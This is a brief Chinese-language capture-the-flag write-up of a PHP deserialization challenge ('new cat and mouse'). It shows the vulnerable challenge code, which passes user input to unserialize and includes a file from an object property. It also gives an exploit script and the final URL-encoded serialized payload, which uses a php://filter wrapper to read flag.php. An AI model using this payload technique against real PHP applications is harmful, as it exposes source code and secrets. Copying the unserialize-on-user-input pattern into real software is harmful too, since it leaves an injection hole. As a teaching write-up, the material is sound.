新猫和老鼠

看到反序列化

来分析一下

 <?php
//flag is in flag.php
highlight_file(__FILE__);
error_reporting(0);class mouse
{
public $v;public function __toString(){echo "Good. You caught the mouse:";include($this->v);这里出现 文件包含 说明 flag.php要在这里进行读取}}class cat
{public $a;public $b;public $c;public function __destruct(){$this->dog();$this->b = $this->c;die($this->a);}public function dog(){ $this->a = "I'm a vicious dog, Kitty";    }
}unserialize($_GET["cat"]); ?>

总的来说 就是 通过伪协议访问 flag.php
然后我们需要构造 字符串为 伪协议的然后通过传递参数到 a中 让 cat执行 伪协议即可

exp

<?phpclass mouse
{public $v="php://filter/read=convert.base64-encode/resource=flag.php";
}class cat
{public $a;public $b;public $c;
}
$ee = new cat();
$ee-> c = new mouse();
$ee-> b = &$ee->a;
echo urlencode(serialize($ee));?>先构造伪协议 作为mouse然后构造 cat 然后把 c写入 伪协议然后再把b写入 a的值进行url编码和序列化

输入后就会触发 _toString函数

O%3A3%3A%22cat%22%3A3%3A%7Bs%3A1%3A%22a%22%3BN%3Bs%3A1%3A%22b%22%3BR%3A2%3Bs%3A1%3A%22c%22%3BO%3A5%3A%22mouse%22%3A1%3A%7Bs%3A1%3A%22v%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D